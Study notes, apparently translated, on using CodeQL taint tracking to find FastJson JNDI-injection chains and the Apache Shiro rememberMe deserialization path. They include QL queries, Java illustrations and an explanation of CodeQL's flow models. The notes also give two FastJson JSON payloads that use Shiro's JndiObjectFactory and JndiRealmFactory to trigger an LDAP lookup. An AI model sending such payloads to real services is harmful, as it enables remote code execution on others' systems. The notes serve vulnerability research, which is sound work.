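CodeQL Study Notes

FastJson JNDI Analysis

Approach

To begin with, be clear about the setup: the vulnerable sink and the conditions for reaching it are already known, and the goal is to use them to find other, still unknown chains.

For example, a setter must satisfy the following conditions: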

- Method name length >= 4
- Non-static method
- Return type is either void or the declaring class
- Exactly one parameter
- Method name starts with set

----

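A getter must satisfy the following conditions:

- Method name length >= 4
- Non-static method
- Method name starts with get, and the fourth character is an uppercase letter
- No parameters
- Return type is, or inherits from, Collection || Map || AtomicBoolean || AtomicInteger || AtomicLong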
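
The two condition lists above can be written down as a small reflection check. This is only a sketch of the rules as listed in these notes, not FastJson's own code; the class name AccessorRules and its helper methods are made up for illustration.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Collection;
import java.util.Map;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicLong;

// Hypothetical helper: encodes the setter/getter conditions listed above.
class AccessorRules {
    static boolean isCandidateSetter(Method m) {
        String name = m.getName();
        Class<?> ret = m.getReturnType();
        return name.length() >= 4
            && name.startsWith("set")
            && !Modifier.isStatic(m.getModifiers())
            && m.getParameterCount() == 1
            && (ret == void.class || ret == m.getDeclaringClass());
    }

    static boolean isCandidateGetter(Method m) {
        String name = m.getName();
        Class<?> ret = m.getReturnType();
        return name.length() >= 4              // checked first, so charAt(3) is safe
            && name.startsWith("get")
            && Character.isUpperCase(name.charAt(3))
            && !Modifier.isStatic(m.getModifiers())
            && m.getParameterCount() == 0
            && (Collection.class.isAssignableFrom(ret)
                || Map.class.isAssignableFrom(ret)
                || ret == AtomicBoolean.class
                || ret == AtomicInteger.class
                || ret == AtomicLong.class);
    }

    // True if the type has a public method with this name that passes the setter rules.
    static boolean hasCandidateSetter(Class<?> type, String methodName) {
        for (Method m : type.getMethods()) {
            if (m.getName().equals(methodName) && isCandidateSetter(m)) {
                return true;
            }
        }
        return false;
    }

    // True if the type has a public method with this name that passes the getter rules.
    static boolean hasCandidateGetter(Class<?> type, String methodName) {
        for (Method m : type.getMethods()) {
            if (m.getName().equals(methodName) && isCandidateGetter(m)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        // JDK classes are used only as convenient test subjects.
        System.out.println(hasCandidateSetter(Thread.class, "setName"));
        System.out.println(hasCandidateGetter(java.util.jar.Manifest.class, "getEntries"));
        System.out.println(hasCandidateGetter(Thread.class, "getName"));
    }
}
```

The same conditions are what a QL class over Method would have to express if the search were narrowed to methods FastJson can actually invoke.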

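Build the CodeQL database first, then start on the QL query file.

QL

I. Defining the JNDI Method

Step one: the target sink is the lookup method of the JNDI classes, so define that method first.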

class JNDIMethod extends Method {
    JNDIMethod() {
        this.getDeclaringType().hasQualifiedName("javax.naming", "Context") and
        this.hasName("lookup")
    }
}

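Here is a line-by-line explanation; later sections will not repeat it.

Line 1: the custom class extends the Method class provided by CodeQL, so that it can pick out the methods we want.
Lines 3 and 4: these are the constraints; any method that satisfies them is a member of the class (this).

Some notes on the predicates used in the constraints:

Member::getDeclaringType -> RefType: gets the type in which this method is declared
RefType::getAnAncestor -> RefType: gets a direct or indirect supertype of this type, including the type itself
RefType::hasQualifiedName -> predicate: holds if this type is declared in the given package with the given name

Translated directly, the whole constraint reads: find methods named lookup whose declaring type is Context in the package javax.naming, that is, javax.naming.Context#lookup.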

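II. Configuring (Global) Taint Tracking

Source

Predicates used

FieldAccess::getSite -> Callable: gets the callable that immediately encloses this field access expression (worth a second read)
Element::getName -> string: gets the name of this element

isSource checks whether a field access expression sits inside a method whose name starts with get or set; if so, that field access becomes a source (starting point) of the search.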

override predicate isSource(DataFlow::Node node) {
    exists(FieldAccess fac | (
            fac.getSite().getName().indexOf("get") = 0 or
            fac.getSite().getName().indexOf("set") = 0
        ) and node.asExpr() = fac
    )
}

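Sink

Predicates used

MethodAccess::getMethod -> Method: gets the method that this call invokes (a mouthful)

isSink checks whether a call invokes a JNDIMethod; if so, the first argument of that call becomes a sink (end point) of the search.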

override predicate isSink(DataFlow::Node node) {
    exists(MethodAccess md | (
            md.getMethod() instanceof JNDIMethod and
            node.asExpr() = md.getArgument(0)
        )
    )
}
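
To make the source and sink concrete, here is a hypothetical Java bean shaped like the code the query is meant to find: a field is read inside a get* method (the source) and passed as the first argument to Context#lookup (the sink). DemoFactory and recordingContext are invented for this sketch; the Context is a recording stub built with java.lang.reflect.Proxy, so nothing is actually resolved over the network.

```java
import java.lang.reflect.Proxy;
import java.util.ArrayList;
import java.util.List;
import javax.naming.Context;
import javax.naming.NamingException;

class LookupFlowDemo {
    // Hypothetical bean: the setter stores attacker-influenced data in a field,
    // and the getter later feeds that field to a JNDI lookup.
    static class DemoFactory {
        private final Context context;
        private String resourceName;

        DemoFactory(Context context) {
            this.context = context;
        }

        public void setResourceName(String resourceName) {
            this.resourceName = resourceName;
        }

        public Object getInstance() {
            try {
                // Source: the field access this.resourceName inside a get* method.
                // Sink: argument 0 of javax.naming.Context#lookup.
                return context.lookup(this.resourceName);
            } catch (NamingException e) {
                throw new IllegalStateException(e);
            }
        }
    }

    // Builds a Context stub that records lookup names instead of contacting a directory.
    static Context recordingContext(List<String> seen) {
        return (Context) Proxy.newProxyInstance(
            LookupFlowDemo.class.getClassLoader(),
            new Class<?>[] {Context.class},
            (proxy, method, args) -> {
                if (method.getName().equals("lookup")) {
                    seen.add(String.valueOf(args[0]));
                }
                return null; // only lookup is called in this demo
            });
    }

    public static void main(String[] args) {
        List<String> seen = new ArrayList<>();
        DemoFactory factory = new DemoFactory(recordingContext(seen));
        factory.setResourceName("ldap://example.invalid/obj");
        factory.getInstance();
        System.out.println(seen);
    }
}
```

Because the call goes through a variable of static type Context, it resolves to javax.naming.Context#lookup, which is exactly the method JNDIMethod describes.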

III. Running the Query

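Honestly, after reading the official documentation I still did not quite see the difference between DataFlow and DataFlow2. As far as I can tell, DataFlow2 is simply a copy of the same library, provided so that several configurations can be used side by side.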

Configuration::hasFlowPath -> predicate: holds if data can flow from source to sink

from MyTaintTraking conf, DataFlow2::PathNode source, DataFlow2::PathNode sink
where conf.hasFlowPath(source, sink)
select ...

Metadata

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.FlowSources
import semmle.code.java.dataflow.TaintTracking2
import DataFlow2::PathGraph

class JNDIMethod extends Method {
    JNDIMethod() {
        this.getDeclaringType().hasQualifiedName("javax.naming", "Context") and
        this.hasName("lookup")
    }
}


class MyTaintTraking extends TaintTracking2::Configuration {
    MyTaintTraking() { this = "MyTaintTraking" }

    override predicate isSource(DataFlow::Node node) {
        exists(FieldAccess fac | (
                fac.getSite().getName().indexOf("get") = 0 or
                fac.getSite().getName().indexOf("set") = 0
            ) and node.asExpr() = fac
        )
    }

    override predicate isSink(DataFlow::Node node) {
        exists(MethodAccess md | (
                md.getMethod() instanceof JNDIMethod and
                node.asExpr() = md.getArgument(0)
            )
        )
    }
}

from MyTaintTraking conf, DataFlow2::PathNode source, DataFlow2::PathNode sink
where conf.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "JNDI lookup might include name from $@", source.getNode(), "this user input"

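IV. Analyzing the Results

A successful run produces alerts. This run produced three, but they correspond to only two chains; an if...else... structure in the middle makes it look as if there are more paths. Reading a path in the results from top to bottom follows the flow from source to sink.

JndiObjectFactory

Corresponding payload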

{
    "@type": "org.apache.shiro.jndi.JndiObjectFactory",
    "resourceName": "ldap://xxxx"
}

JndiRealmFactory

Corresponding payload

{
    "@type": "org.apache.shiro.realm.jndi.JndiRealmFactory",
    "jndiNames": [
        "ldap://xxxx"
    ]
}

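Shiro Deserialization Analysis

We know that deserialization ends at java.io.ObjectInputStream#readObject, so that method can serve as the sink. The key question is how to choose the source.

QL

To start, we can be sure the data flows from some field into the deserialization call, so the source is set to every field access.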

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking2
import semmle.code.java.dataflow.FlowSources
import DataFlow2::PathGraph


class DeseializationMethod extends Method {
    DeseializationMethod() {
        this.getDeclaringType().hasQualifiedName("java.io", "ObjectInputStream") and
        this.hasName("readObject")
    }
}

class MyTaintTest extends TaintTracking2::Configuration {
    MyTaintTest() { this = "MyTaintTest"}

    override predicate isSource (DataFlow::Node node) {
        exists(FieldAccess fda | fda = node.asExpr())
    }

    override predicate isSink(DataFlow::Node node) { 
        exists(MethodAccess mda | 
            mda = node.asExpr() and 
            mda.getMethod() instanceof DeseializationMethod
        )
    }
}

from MyTaintTest conf, DataFlow2::PathNode source, DataFlow2::PathNode sink
where conf.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "from $@", source.getNode(), "this user input"

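The resulting paths actually get stuck at AbstractRememberMeManager, which means the flow further upstream, toward the real source, is broken.

Improving the Source

Following an expert's suggestion, use RemoteFlowSource as the source (what it actually represents is covered below). The code above stays essentially unchanged; only the isSource logic is modified.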

override predicate isSource (DataFlow::Node node) {
    node instanceof RemoteFlowSource
}

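Now the path goes all the way back to SimpleCookie, which is essentially the entry point, and the variable passing in between is identified and resolved for us as well.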
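
The general shape of such a path can be reproduced in miniature: a cookie-like Base64 string is decoded and the bytes are handed to ObjectInputStream#readObject. This is a simplified stand-in, not Shiro's code (among other things it skips the decryption step), and the class and method names are invented for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.util.Base64;

class CookieDeserializeDemo {
    // Produces a Base64 "cookie value" holding a serialized object.
    static String encode(Serializable value) {
        try (ByteArrayOutputStream bytes = new ByteArrayOutputStream();
             ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(value);
            out.flush(); // push buffered data into the byte array before reading it
            return Base64.getEncoder().encodeToString(bytes.toByteArray());
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Mirrors the flow: remote string -> Base64 decode -> readObject.
    static Object decode(String cookieValue) {
        // Intermediate step: the decoded bytes carry the taint of the input string.
        byte[] raw = Base64.getDecoder().decode(cookieValue);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            // Sink: java.io.ObjectInputStream#readObject.
            return in.readObject();
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        // A plain String is used so the demo deserializes nothing dangerous.
        String cookie = encode("hello");
        System.out.println(decode(cookie));
    }
}
```

Each hop in between (here only the Base64 decode) is a place where the analysis needs to know that taint carries over from input to output.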

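RemoteFlowSource

The code lives in /java/ql/lib/semmle/code/java/dataflow/FlowSources.qll; it mainly identifies the various flow sources that can be used for taint tracking.

Because it has many subclasses, it is hard to tell which one actually matched. Changing the output to source.getNode().getAQlClass() lists the QL classes the source node belongs to, and that output shows that the key one is ExternalRemoteFlowSource.

ExternalRemoteFlowSource

The definition is simple; the work is done by the sourceNode predicate.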

private class ExternalRemoteFlowSource extends RemoteFlowSource {
  ExternalRemoteFlowSource() { sourceNode(this, "remote") }

  override string getSourceType() { result = "external" }
}

The predicate is defined at /java/ql/lib/semmle/code/java/dataflow/ExternalFlow.qll#L723

predicate sourceNode(Node node, string kind) {
    exists(InterpretNode n | isSourceNode(n, kind) and n.asNode() = node)
}

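We will not follow the predicates any deeper here. Instead, look at the ExternalFlow file it lives in: the comments there are important and make things easier to understand. They are too long to reproduce in full, so read them yourself; the part we care about is this: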

The CSV specification has the following columns:
 - Sources:
   `namespace; type; subtypes; name; signature; ext; output; kind`
 - Sinks:
   `namespace; type; subtypes; name; signature; ext; input; kind`
 - Summaries:
   `namespace; type; subtypes; name; signature; ext; input; output; kind`

The `kind` column is a tag that can be referenced from QL to determine to which classes the interpreted elements should be added. For example, for sources "remote" indicates a default remote flow source, and for summaries "taint" indicates a default additional taint step and "value" indicates a globally applicable value-preserving step.

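From the above, the role of kind is roughly this: the model rows are interpreted, and kind tags each interpreted element with one of three types:

remote : a remote flow source
taint : an additional taint step
value : a globally applicable value-preserving step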

private predicate sourceModelCsv(string row) {
  row =
    [ ...
    // CookieGet*
      "javax.servlet.http;Cookie;false;getValue;();;ReturnValue;remote",
      "javax.servlet.http;Cookie;false;getName;();;ReturnValue;remote",
      "javax.servlet.http;Cookie;false;getComment;();;ReturnValue;remote",
    ...
    ]
}

private predicate summaryModelCsv(string row) {
  row =
    [ ...
    // arg to return
      "java.nio;ByteBuffer;false;wrap;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;encode;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;encode;(ByteBuffer);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;encodeToString;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Encoder;false;wrap;(OutputStream);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;decode;(byte[]);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;decode;(ByteBuffer);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;decode;(String);;Argument[0];ReturnValue;taint",
      "java.util;Base64$Decoder;false;wrap;(InputStream);;Argument[0];ReturnValue;taint",
      "cn.hutool.core.codec;Base64;true;decode;;;Argument[0];ReturnValue;taint",
      "org.apache.shiro.codec;Base64;false;decode;(String);;Argument[0];ReturnValue;taint",
      ...
    ]
}
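
The column layout is easier to see when one of these rows is split into named fields. The following is a minimal sketch that follows the column lists quoted above; ModelRowDemo is a made-up helper and has nothing to do with how CodeQL itself interprets the rows.

```java
import java.util.LinkedHashMap;
import java.util.Map;

class ModelRowDemo {
    // Column names taken from the CSV specification quoted above.
    static final String[] SOURCE_COLUMNS =
        {"namespace", "type", "subtypes", "name", "signature", "ext", "output", "kind"};
    static final String[] SUMMARY_COLUMNS =
        {"namespace", "type", "subtypes", "name", "signature", "ext", "input", "output", "kind"};

    // Splits a semicolon-separated model row and pairs each cell with its column name.
    static Map<String, String> parse(String row, String[] columns) {
        // The -1 limit keeps empty cells such as the blank "ext" column.
        String[] cells = row.split(";", -1);
        if (cells.length != columns.length) {
            throw new IllegalArgumentException(
                "expected " + columns.length + " columns but found " + cells.length);
        }
        Map<String, String> fields = new LinkedHashMap<>();
        for (int i = 0; i < columns.length; i++) {
            fields.put(columns[i], cells[i]);
        }
        return fields;
    }

    public static void main(String[] args) {
        System.out.println(parse(
            "javax.servlet.http;Cookie;false;getValue;();;ReturnValue;remote",
            SOURCE_COLUMNS));
        System.out.println(parse(
            "java.util;Base64$Decoder;false;decode;(String);;Argument[0];ReturnValue;taint",
            SUMMARY_COLUMNS));
    }
}
```

Read this way, the first row says that the return value of Cookie#getValue() is a remote source, and the second says that taint on argument 0 of Base64.Decoder#decode(String) carries over to its return value.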

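The key point, then, is that CodeQL already identifies the data sources of mainstream frameworks for us and connects them by modelling certain value-passing points as taint steps, which saves a lot of trouble. At the same time, because it is limited to what has been modelled, it is much less effective for code that is entirely home-grown (although such a project would be a rare thing).

References

从Java反序列化漏洞题看CodeQL数据流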